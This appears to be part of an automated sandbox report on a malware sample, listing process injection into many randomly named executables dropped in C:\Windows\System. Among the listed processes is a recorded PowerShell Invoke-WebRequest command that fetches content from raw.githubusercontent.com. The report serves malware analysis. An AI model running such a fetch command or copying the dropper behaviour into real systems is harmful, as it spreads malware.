PID 1952 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\eUWPOzx.exe
PID 1952 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bfrQjnx.exe
PID 1952 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bfrQjnx.exe
PID 1952 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bfrQjnx.exe
PID 1952 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KNIfQfP.exe
PID 1952 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KNIfQfP.exe
PID 1952 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KNIfQfP.exe
PID 1952 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pJSuRtd.exe
PID 1952 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pJSuRtd.exe
PID 1952 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pJSuRtd.exe
PID 1952 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\WBwDDtH.exe
PID 1952 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\WBwDDtH.exe
PID 1952 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\WBwDDtH.exe
PID 1952 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SpQVfYH.exe
PID 1952 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SpQVfYH.exe
PID 1952 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SpQVfYH.exe
PID 1952 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bqBflpu.exe
PID 1952 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bqBflpu.exe
PID 1952 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\bqBflpu.exe
PID 1952 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\opBLzAT.exe
PID 1952 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\opBLzAT.exe
PID 1952 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\opBLzAT.exe
PID 1952 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\DcuyZwn.exe
PID 1952 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\DcuyZwn.exe
PID 1952 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\DcuyZwn.exe
PID 1952 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KAuNvQR.exe
PID 1952 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KAuNvQR.exe
PID 1952 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\KAuNvQR.exe
PID 1952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\NQjTQrh.exe
PID 1952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\NQjTQrh.exe
PID 1952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\NQjTQrh.exe
PID 1952 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\hZGQPGI.exe
PID 1952 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\hZGQPGI.exe
PID 1952 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\hZGQPGI.exe
PID 1952 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\uTpVneB.exe
PID 1952 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\uTpVneB.exe
PID 1952 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\uTpVneB.exe
PID 1952 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\USbaVXl.exe
PID 1952 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\USbaVXl.exe
PID 1952 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\USbaVXl.exe
PID 1952 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\foDoYkR.exe
PID 1952 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\foDoYkR.exe
PID 1952 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\foDoYkR.exe
PID 1952 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\ZLWxMvX.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\SOoGCrK.exe

C:\Windows\System\SOoGCrK.exe

C:\Windows\System\acxakzg.exe

C:\Windows\System\acxakzg.exe

C:\Windows\System\AMnikxA.exe

C:\Windows\System\AMnikxA.exe

C:\Windows\System\pXzSReG.exe

C:\Windows\System\pXzSReG.exe

C:\Windows\System\XWWfxFp.exe

C:\Windows\System\XWWfxFp.exe

C:\Windows\System\eUWPOzx.exe

C:\Windows\System\eUWPOzx.exe

C:\Windows\System\bfrQjnx.exe

C:\Windows\System\bfrQjnx.exe

C:\Windows\System\KNIfQfP.exe

C:\Windows\System\KNIfQfP.exe

C:\Windows\System\pJSuRtd.exe

C:\Windows\System\pJSuRtd.exe

C:\Windows\System\WBwDDtH.exe

C:\Windows\System\WBwDDtH.exe

C:\Windows\System\SpQVfYH.exe

C:\Windows\System\SpQVfYH.exe

C:\Windows\System\bqBflpu.exe

C:\Windows\System\bqBflpu.exe

C:\Windows\System\opBLzAT.exe

C:\Windows\System\opBLzAT.exe

C:\Windows\System\DcuyZwn.exe

C:\Windows\System\DcuyZwn.exe

C:\Windows\System\KAuNvQR.exe

C:\Windows\System\KAuNvQR.exe

C:\Windows\System\NQjTQrh.exe

C:\Windows\System\NQjTQrh.exe

C:\Windows\System\hZGQPGI.exe

C:\Windows\System\hZGQPGI.exe

C:\Windows\System\uTpVneB.exe

C:\Windows\System\uTpVneB.exe

C:\Windows\System\USbaVXl.exe

C:\Windows\System\USbaVXl.exe

C:\Windows\System\foDoYkR.exe

C:\Windows\System\foDoYkR.exe

C:\Windows\System\ZLWxMvX.exe

C:\Windows\System\ZLWxMvX.exe

C:\Windows\System\Sitjwla.exe

C:\Windows\System\Sitjwla.exe

C:\Windows\System\OhvQrSL.exe

C:\Windows\System\OhvQrSL.exe

C:\Windows\System\usMjTnG.exe

C:\Windows\System\usMjTnG.exe

C:\Windows\System\VAXGrfI.exe

C:\Windows\System\VAXGrfI.exe

C:\Windows\System\zmzhbMd.exe

C:\Windows\System\zmzhbMd.exe

C:\Windows\System\NyUkQiF.exe

C:\Windows\System\NyUkQiF.exe

C:\Windows\System\AWQucSh.exe

C:\Windows\System\AWQucSh.exe

C:\Windows\System\cxfpozJ.exe

C:\Windows\System\cxfpozJ.exe

C:\Windows\System\aDpXoRl.exe

C:\Windows\System\aDpXoRl.exe

C:\Windows\System\aLaewar.exe

C:\Windows\System\aLaewar.exe

C:\Windows\System\YyLHryZ.exe

C:\Windows\System\YyLHryZ.exe

C:\Windows\System\RNDkhIs.exe

C:\Windows\System\RNDkhIs.exe

C:\Windows\System\mSkVwnR.exe

C:\Windows\System\mSkVwnR.exe

C:\Windows\System\hiINuLp.exe

C:\Windows\System\hiINuLp.exe

C:\Windows\System\XVcnAkl.exe

C:\Windows\System\XVcnAkl.exe

C:\Windows\System\RQCasBe.exe

C:\Windows\System\RQCasBe.exe

C:\Windows\System\JciQTgf.exe

C:\Windows\System\JciQTgf.exe

C:\Windows\System\ooKhfIw.exe

C:\Windows\System\ooKhfIw.exe

C:\Windows\System\fjFezcL.exe

C:\Windows\System\fjFezcL.exe

C:\Windows\System\JbeGwGI.exe

C:\Windows\System\JbeGwGI.exe

C:\Windows\System\WuVwlit.exe

C:\Windows\System\WuVwlit.exe

C:\Windows\System\rLKUPha.exe

C:\Windows\System\rLKUPha.exe

C:\Windows\System\BZZAgfM.exe

C:\Windows\System\BZZAgfM.exe

C:\Windows\System\LCElIFz.exe

C:\Windows\System\LCElIFz.exe

C:\Windows\System\lChwIRA.exe

C:\Windows\System\lChwIRA.exe

C:\Windows\System\ybbxJuM.exe

C:\Windows\System\ybbxJuM.exe

C:\Windows\System\fEJvvut.exe

C:\Windows\System\fEJvvut.exe

C:\Windows\System\ivGTzbh.exe

C:\Windows\System\ivGTzbh.exe

C:\Windows\System\DTQWxzP.exe

C:\Windows\System\DTQWxzP.exe

C:\Windows\System\cghcuBQ.exe

C:\Windows\System\cghcuBQ.exe

C:\Windows\System\PvGPSCM.exe

C:\Windows\System\PvGPSCM.exe

C:\Windows\System\isWmqmD.exe

C:\Windows\System\isWmqmD.exe

C:\Windows\System\XZTRnxv.exe

C:\Windows\System\XZTRnxv.exe

C:\Windows\System\AehmnOI.exe

C:\Windows\System\AehmnOI.exe

C:\Windows\System\lNIwlSv.exe

C:\Windows\System\lNIwlSv.exe

C:\Windows\System\KcdVcpU.exe

C:\Windows\System\KcdVcpU.exe

C:\Windows\System\eoPCjlx.exe

C:\Windows\System\eoPCjlx.exe

C:\Windows\System\leiIbsO.exe

C:\Windows\System\leiIbsO.exe

C:\Windows\System\rjebJFj.exe

C:\Windows\System\rjebJFj.exe

C:\Windows\System\MZyeXuC.exe

C:\Windows\System\MZyeXuC.exe

C:\Windows\System\bJUfTds.exe

C:\Windows\System\bJUfTds.exe

C:\Windows\System\TOYDhbp.exe

C:\Windows\System\TOYDhbp.exe

C:\Windows\System\yIxkqTD.exe

C:\Windows\System\yIxkqTD.exe

C:\Windows\System\EYZlTxp.exe

C:\Windows\System\EYZlTxp.exe

C:\Windows\System\zOXFwHO.exe

C:\Windows\System\zOXFwHO.exe

C:\Windows\System\bYGpOcx.exe

C:\Windows\System\bYGpOcx.exe

C:\Windows\System\lshzstk.exe

C:\Windows\System\lshzstk.exe

C:\Windows\System\ShMOayO.exe

C:\Windows\System\ShMOayO.exe

C:\Windows\System\lPikJFR.exe

C:\Windows\System\lPikJFR.exe

C:\Windows\System\xluXrWq.exe

C:\Windows\System\xluXrWq.exe

C:\Windows\System\HTwLurx.exe

C:\Windows\System\HTwLurx.exe

C:\Windows\System\RnWJfnd.exe

C:\Windows\System\RnWJfnd.exe

C:\Windows\System\AWfrlAs.exe

C:\Windows\System\AWfrlAs.exe

C:\Windows\System\AgOgcek.exe

C:\Windows\System\AgOgcek.exe

C:\Windows\System\ZDQSjfG.exe

C:\Windows\System\ZDQSjfG.exe

C:\Windows\System\OSAtyTX.exe

C:\Windows\System\OSAtyTX.exe

C:\Windows\System\DaVyldG.exe

C:\Windows\System\DaVyldG.exe

C:\Windows\System\osSGCxh.exe

C:\Windows\System\osSGCxh.exe

C:\Windows\System\ofjNbzB.exe

C:\Windows\System\ofjNbzB.exe

C:\Windows\System\QEvWdEE.exe

C:\Windows\System\QEvWdEE.exe

C:\Windows\System\YMgGpco.exe

C:\Windows\System\YMgGpco.exe

C:\Windows\System\CrBROHN.exe

C:\Windows\System\CrBROHN.exe

C:\Windows\System\JcvyDVx.exe

C:\Windows\System\JcvyDVx.exe

C:\Windows\System\hxfpJCo.exe

C:\Windows\System\hxfpJCo.exe

C:\Windows\System\iiyABie.exe

C:\Windows\System\iiyABie.exe

C:\Windows\System\XJvsSWG.exe

C:\Windows\System\XJvsSWG.exe

C:\Windows\System\RFMtTuE.exe

C:\Windows\System\RFMtTuE.exe

C:\Windows\System\ywMSIxq.exe

C:\Windows\System\ywMSIxq.exe

C:\Windows\System\YELIkKA.exe

C:\Windows\System\YELIkKA.exe

C:\Windows\System\NZAXTbR.exe

C:\Windows\System\NZAXTbR.exe

C:\Windows\System\gpsTogK.exe

C:\Windows\System\gpsTogK.exe

C:\Windows\System\bafKdsG.exe

C:\Windows\System\bafKdsG.exe

C:\Windows\System\nXhrCPe.exe

C:\Windows\System\nXhrCPe.exe

C:\Windows\System\UASfiaX.exe

C:\Windows\System\UASfiaX.exe

C:\Windows\System\HYfuQQR.exe

C:\Windows\System\HYfuQQR.exe

C:\Windows\System\DwOUeoW.exe

C:\Windows\System\DwOUeoW.exe

C:\Windows\System\gcJmyVv.exe

C:\Windows\System\gcJmyVv.exe

C:\Windows\System\JcXCCxu.exe

C:\Windows\System\JcXCCxu.exe

C:\Windows\System\GLZxgVa.exe

C:\Windows\System\GLZxgVa.exe

C:\Windows\System\PrhtUsx.exe

C:\Windows\System\PrhtUsx.exe

C:\Windows\System\YvCqDcu.exe

C:\Windows\System\YvCqDcu.exe

C:\Windows\System\VMlDeLC.exe

C:\Windows\System\VMlDeLC.exe

C:\Windows\System\WHkTwaQ.exe

C:\Windows\System\WHkTwaQ.exe

C:\Windows\System\qgJwZsy.exe

C:\Windows\System\qgJwZsy.exe

C:\Windows\System\zCNgyFo.exe

C:\Windows\System\zCNgyFo.exe

C:\Windows\System\EKJwcrm.exe

C:\Windows\System\EKJwcrm.exe

C:\Windows\System\VkUbNQS.exe

C:\Windows\System\VkUbNQS.exe

C:\Windows\System\xwXKxLM.exe

C:\Windows\System\xwXKxLM.exe

C:\Windows\System\RvAGDJt.exe

C:\Windows\System\RvAGDJt.exe

C:\Windows\System\XXdvmcL.exe

C:\Windows\System\XXdvmcL.exe

C:\Windows\System\pmvRGDL.exe

C:\Windows\System\pmvRGDL.exe

C:\Windows\System\xbBHRus.exe

C:\Windows\System\xbBHRus.exe

C:\Windows\System\CudSAQK.exe

C:\Windows\System\CudSAQK.exe

C:\Windows\System\ffuRqDl.exe

C:\Windows\System\ffuRqDl.exe

C:\Windows\System\NARWGEw.exe

C:\Windows\System\NARWGEw.exe

C:\Windows\System\hhtqzhi.exe

C:\Windows\System\hhtqzhi.exe

C:\Windows\System\zZyLdku.exe

C:\Windows\System\zZyLdku.exe

C:\Windows\System\KsxFFyM.exe

C:\Windows\System\KsxFFyM.exe

C:\Windows\System\ZEcELPF.exe

C:\Windows\System\ZEcELPF.exe

C:\Windows\System\ZcBHLIP.exe

C:\Windows\System\ZcBHLIP.exe

C:\Windows\System\Vxptkki.exe

C:\Windows\System\Vxptkki.exe

C:\Windows\System\YtOrWJV.exe

C:\Windows\System\YtOrWJV.exe

C:\Windows\System\NJaOkTW.exe

C:\Windows\System\NJaOkTW.exe

C:\Windows\System\sXVQOWc.exe

C:\Windows\System\sXVQOWc.exe

C:\Windows\System\GcgJcqT.exe

C:\Windows\System\GcgJcqT.exe

C:\Windows\System\BDHFfNB.exe

C:\Windows\System\BDHFfNB.exe

C:\Windows\System\shjLChO.exe

C:\Windows\System\shjLChO.exe

C:\Windows\System\ZfKedTT.exe

C:\Windows\System\ZfKedTT.exe

C:\Windows\System\dWvFEQc.exe

C:\Windows\System\dWvFEQc.exe

C:\Windows\System\beYojUj.exe

C:\Windows\System\beYojUj.exe

C:\Windows\System\QmceRjA.exe

C:\Windows\System\QmceRjA.exe

C:\Windows\System\nbkFHJf.exe

C:\Windows\System\nbkFHJf.exe

C:\Windows\System\LrUvOaX.exe

C:\Windows\System\LrUvOaX.exe

C:\Windows\System\Hbewxdt.exe

C:\Windows\System\Hbewxdt.exe

C:\Windows\System\nwCnIdK.exe

C:\Windows\System\nwCnIdK.exe

C:\Windows\System\grmCTZw.exe

C:\Windows\System\grmCTZw.exe

C:\Windows\System\oCYkaEi.exe

C:\Windows\System\oCYkaEi.exe

C:\Windows\System\riOvYtn.exe

C:\Windows\System\riOvYtn.exe

C:\Windows\System\PdjMfAc.exe

C:\Windows\System\PdjMfAc.exe

C:\Windows\System\wiacwYg.exe

C:\Windows\System\wiacwYg.exe

C:\Windows\System\dxgPClI.exe

C:\Windows\System\dxgPClI.exe

C:\Windows\System\NpqpIBH.exe

C:\Windows\System\NpqpIBH.exe

C:\Windows\System\wRrDXtm.exe

C:\Windows\System\wRrDXtm.exe

C:\Windows\System\rBMXlBm.exe

C:\Windows\System\rBMXlBm.exe

C:\Windows\System\fpEAGLL.exe

C:\Windows\System\fpEAGLL.exe

C:\Windows\System\OgpwEHq.exe

C:\Windows\System\OgpwEHq.exe

C:\Windows\System\PRIrXAQ.exe

C:\Windows\System\PRIrXAQ.exe

C:\Windows\System\ymPhTbV.exe

C:\Windows\System\ymPhTbV.exe

C:\Windows\System\BvYyDns.exe

C:\Windows\System\BvYyDns.exe

C:\Windows\System\DJUGCNT.exe

C:\Windows\System\DJUGCNT.exe

C:\Windows\System\qyzHbZX.exe

C:\Windows\System\qyzHbZX.exe

C:\Windows\System\zaRvanb.exe

C:\Windows\System\zaRvanb.exe

C:\Windows\System\OhtTYWY.exe

C:\Windows\System\OhtTYWY.exe

C:\Windows\System\LcqVDRZ.exe

C:\Windows\System\LcqVDRZ.exe

C:\Windows\System\fNcdmWi.exe

C:\Windows\System\fNcdmWi.exe

C:\Windows\System\zWNapDl.exe

C:\Windows\System\zWNapDl.exe

C:\Windows\System\UVlhdjK.exe

C:\Windows\System\UVlhdjK.exe

C:\Windows\System\OyjlRmG.exe

C:\Windows\System\OyjlRmG.exe

C:\Windows\System\sFKFIXu.exe

C:\Windows\System\sFKFIXu.exe

C:\Windows\System\wThbpLH.exe

C:\Windows\System\wThbpLH.exe

C:\Windows\System\XSgMTZW.exe

C:\Windows\System\XSgMTZW.exe

C:\Windows\System\GIoflMM.exe

C:\Windows\System\GIoflMM.exe

C:\Windows\System\hxqlOIV.exe

C:\Windows\System\hxqlOIV.exe

C:\Windows\System\SUeFlnl.exe

C:\Windows\System\SUeFlnl.exe

C:\Windows\System\iwpWJnP.exe

C:\Windows\System\iwpWJnP.exe

C:\Windows\System\ERFnfcb.exe

C:\Windows\System\ERFnfcb.exe

C:\Windows\System\qVGZQuD.exe

C:\Windows\System\qVGZQuD.exe

C:\Windows\System\nuCIjNC.exe

C:\Windows\System\nuCIjNC.exe

C:\Windows\System\GeAJLBM.exe

C:\Windows\System\GeAJLBM.exe

C:\Windows\System\uXqvAGe.exe

C:\Windows\System\uXqvAGe.exe

C:\Windows\System\wFYcgFa.exe

C:\Windows\System\wFYcgFa.exe

C:\Windows\System\QmUStqJ.exe

C:\Windows\System\QmUStqJ.exe

C:\Windows\System\CxYzfIY.exe

C:\Windows\System\CxYzfIY.exe

C:\Windows\System\lkcDIyx.exe

C:\Windows\System\lkcDIyx.exe

C:\Windows\System\IITfBtC.exe

C:\Windows\System\IITfBtC.exe

C:\Windows\System\zogdGBi.exe

C:\Windows\System\zogdGBi.exe

C:\Windows\System\DAZJjCC.exe

C:\Windows\System\DAZJjCC.exe

C:\Windows\System\sqOWhay.exe

C:\Windows\System\sqOWhay.exe

C:\Windows\System\neYIOpF.exe

C:\Windows\System\neYIOpF.exe

C:\Windows\System\ZeKikyK.exe

C:\Windows\System\ZeKikyK.exe

C:\Windows\System\aDOaUfs.exe

C:\Windows\System\aDOaUfs.exe

C:\Windows\System\sLSiIQi.exe

C:\Windows\System\sLSiIQi.exe

C:\Windows\System\PHiTNRx.exe

C:\Windows\System\PHiTNRx.exe

C:\Windows\System\MUDIEFN.exe

C:\Windows\System\MUDIEFN.exe

C:\Windows\System\iiBJQIN.exe

C:\Windows\System\iiBJQIN.exe

C:\Windows\System\gHuJawj.exe

C:\Windows\System\gHuJawj.exe

C:\Windows\System\TDTkVxr.exe

C:\Windows\System\TDTkVxr.exe

C:\Windows\System\RVHTYfb.exe

C:\Windows\System\RVHTYfb.exe

C:\Windows\System\QJtriaA.exe

C:\Windows\System\QJtriaA.exe

C:\Windows\System\vVuEPqL.exe

C:\Windows\System\vVuEPqL.exe

C:\Windows\System\keDDmdt.exe

C:\Windows\System\keDDmdt.exe

C:\Windows\System\zAXaxnQ.exe

C:\Windows\System\zAXaxnQ.exe

C:\Windows\System\dKxoTyL.exe

C:\Windows\System\dKxoTyL.exe

C:\Windows\System\pYkLQKN.exe

C:\Windows\System\pYkLQKN.exe

C:\Windows\System\bpDPvAe.exe

C:\Windows\System\bpDPvAe.exe

C:\Windows\System\JUrJfCt.exe

C:\Windows\System\JUrJfCt.exe

C:\Windows\System\dwCoQiD.exe

C:\Windows\System\dwCoQiD.exe

C:\Windows\System\ZqykRqQ.exe

C:\Windows\System\ZqykRqQ.exe

C:\Windows\System\oIkzyft.exe

C:\Windows\System\oIkzyft.exe

C:\Windows\System\uLeJhtR.exe

C:\Windows\System\uLeJhtR.exe

C:\Windows\System\lpIknJU.exe

C:\Windows\System\lpIknJU.exe

C:\Windows\System\ozdvkwW.exe

C:\Windows\System\ozdvkwW.exe

C:\Windows\System\QUHVYsh.exe

C:\Windows\System\QUHVYsh.exe

C:\Windows\System\FxqaXNy.exe

C:\Windows\System\FxqaXNy.exe

C:\Windows\System\UysCZAp.exe

C:\Windows\System\UysCZAp.exe

C:\Windows\System\aGHyfQl.exe

C:\Windows\System\aGHyfQl.exe

C:\Windows\System\uXIpiYf.exe

C:\Windows\System\uXIpiYf.exe

C:\Windows\System\FuWOeSj.exe

C:\Windows\System\FuWOeSj.exe

C:\Windows\System\FooNfgX.exe

C:\Windows\System\FooNfgX.exe

C:\Windows\System\swwbBFH.exe

C:\Windows\System\swwbBFH.exe

C:\Windows\System\ZMKmgXZ.exe

C:\Windows\System\ZMKmgXZ.exe

C:\Windows\System\FqyaQwA.exe

C:\Windows\System\FqyaQwA.exe

C:\Windows\System\QJinXTW.exe

C:\Windows\System\QJinXTW.exe

C:\Windows\System\qnFKEnu.exe

C:\Windows\System\qnFKEnu.exe

C:\Windows\System\JWxlrWj.exe

C:\Windows\System\JWxlrWj.exe

C:\Windows\System\MluDilK.exe

C:\Windows\System\MluDilK.exe

C:\Windows\System\mNfabGs.exe

C:\Windows\System\mNfabGs.exe

C:\Windows\System\vqmXCAS.exe

C:\Windows\System\vqmXCAS.exe

C:\Windows\System\nflaBPl.exe

C:\Windows\System\nflaBPl.exe

C:\Windows\System\RVvjCvc.exe

C:\Windows\System\RVvjCvc.exe

C:\Windows\System\YYCtvTs.exe

C:\Windows\System\YYCtvTs.exe

C:\Windows\System\MNAqFJA.exe

C:\Windows\System\MNAqFJA.exe

C:\Windows\System\fZLsMHj.exe

C:\Windows\System\fZLsMHj.exe

C:\Windows\System\pQJvGyv.exe

C:\Windows\System\pQJvGyv.exe

C:\Windows\System\QweVkRZ.exe

C:\Windows\System\QweVkRZ.exe

C:\Windows\System\pMQEgMu.exe

C:\Windows\System\pMQEgMu.exe

C:\Windows\System\sBMngDj.exe

C:\Windows\System\sBMngDj.exe

C:\Windows\System\MVnQRMV.exe

C:\Windows\System\MVnQRMV.exe

C:\Windows\System\UpGUExv.exe

C:\Windows\System\UpGUExv.exe

C:\Windows\System\gTKiyun.exe

C:\Windows\System\gTKiyun.exe

C:\Windows\System\wDXjzvR.exe

C:\Windows\System\wDXjzvR.exe

C:\Windows\System\TOKaXZF.exe

C:\Windows\System\TOKaXZF.exe

C:\Windows\System\WZlFIDJ.exe

C:\Windows\System\WZlFIDJ.exe

C:\Windows\System\iMTzkrI.exe

C:\Windows\System\iMTzkrI.exe

C:\Windows\System\LDwjfps.exe

C:\Windows\System\LDwjfps.exe

C:\Windows\System\lrITRWD.exe

C:\Windows\System\lrITRWD.exe

C:\Windows\System\yYEqYDW.exe

C:\Windows\System\yYEqYDW.exe

C:\Windows\System\VnQpYXO.exe

C:\Windows\System\VnQpYXO.exe

C:\Windows\System\JRaxYwp.exe

C:\Windows\System\JRaxYwp.exe

C:\Windows\System\ZGUZMbq.exe

C:\Windows\System\ZGUZMbq.exe

C:\Windows\System\tJUlWNn.exe

C:\Windows\System\tJUlWNn.exe

C:\Windows\System\mPgPwnb.exe

C:\Windows\System\mPgPwnb.exe

C:\Windows\System\NdgwtCi.exe

C:\Windows\System\NdgwtCi.exe

C:\Windows\System\eVeTBUS.exe

C:\Windows\System\eVeTBUS.exe

C:\Windows\System\dyrocNx.exe

C:\Windows\System\dyrocNx.exe

C:\Windows\System\lAUWhmD.exe

C:\Windows\System\lAUWhmD.exe

C:\Windows\System\ScQLGkl.exe

C:\Windows\System\ScQLGkl.exe

C:\Windows\System\mCJHrSS.exe

C:\Windows\System\mCJHrSS.exe

C:\Windows\System\pSYcftT.exe

C:\Windows\System\pSYcftT.exe

C:\Windows\System\nRUUhzj.exe

C:\Windows\System\nRUUhzj.exe

C:\Windows\System\gokvzJw.exe

C:\Windows\System\gokvzJw.exe

C:\Windows\System\PqwimGO.exe

C:\Windows\System\PqwimGO.exe

C:\Windows\System\GSmyOqI.exe

C:\Windows\System\GSmyOqI.exe

C:\Windows\System\FxJuwXQ.exe

C:\Windows\System\FxJuwXQ.exe

C:\Windows\System\hhuayJt.exe

C:\Windows\System\hhuayJt.exe

C:\Windows\System\ARezDLX.exe

C:\Windows\System\ARezDLX.exe

C:\Windows\System\PkDgiyf.exe

C:\Windows\System\PkDgiyf.exe

C:\Windows\System\BufaZIY.exe

C:\Windows\System\BufaZIY.exe

C:\Windows\System\ZWoCjkv.exe

C:\Windows\System\ZWoCjkv.exe

C:\Windows\System\RkZUqns.exe

C:\Windows\System\RkZUqns.exe

C:\Windows\System\vHRrgan.exe

C:\Windows\System\vHRrgan.exe

C:\Windows\System\azvWynk.exe

C:\Windows\System\azvWynk.exe

C:\Windows\System\fvzjrOA.exe

C:\Windows\System\fvzjrOA.exe

C:\Windows\System\FxXmgMq.exe

C:\Windows\System\FxXmgMq.exe

C:\Windows\System\MQmMrPX.exe

C:\Windows\System\MQmMrPX.exe

C:\Windows\System\jvLaoFN.exe

C:\Windows\System\jvLaoFN.exe

C:\Windows\System\tlrXrzl.exe

C:\Windows\System\tlrXrzl.exe

C:\Windows\System\TEOxlAd.exe

C:\Windows\System\TEOxlAd.exe

C:\Windows\System\WERYduA.exe

C:\Windows\System\WERYduA.exe

C:\Windows\System\CFdlImw.exe

C:\Windows\System\CFdlImw.exe

C:\Windows\System\evZLEzd.exe

C:\Windows\System\evZLEzd.exe

C:\Windows\System\nBMghVf.exe

C:\Windows\System\nBMghVf.exe

C:\Windows\System\ETuvsdc.exe

C:\Windows\System\ETuvsdc.exe

